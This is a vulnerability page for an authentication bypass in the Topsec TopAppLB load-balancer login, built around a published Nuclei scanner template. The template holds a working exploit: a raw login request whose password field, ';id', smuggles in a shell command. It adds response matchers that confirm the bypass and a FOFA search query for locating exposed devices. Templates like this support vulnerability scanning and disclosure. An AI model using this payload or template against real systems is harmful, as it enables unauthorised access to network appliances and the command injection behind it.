漏洞描述
Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
topsec-topapplb-auth-bypass: Topsec TopAppLB - Authentication Bypass
PoC代码[已公开]
id: topsec-topapplb-auth-bypass
info:
name: Topsec TopAppLB - Authentication Bypass
author: SleepingBag945
severity: high
description: |
Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
reference:
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
metadata:
verified: true
max-request: 2
fofa-query: title="TopApp-LB 负载均衡系统"
tags: topsec,topapplb,auth-bypass,vuln
http:
- raw:
- |
POST /login_check.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName=admin&password=%3Bid
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_1 == 302 && status_code_2 == 200'
- 'contains(body_2,"var IsHeadMin ")'
- 'contains(header_1,"redirect.php") && !contains(tolower(header_1), "error=1")'
condition: and
# digest: 490a00463044022001365cc58d849b2dcd69d94bc35eb5197ded53b5bce3e137837022b7cc9512bf02203a5a0f7497a1e560c6cf59bf5f8d5dcb12080d0781b1d1142f9b24a38c458704:922c64590222798bb761d5b6d8e72950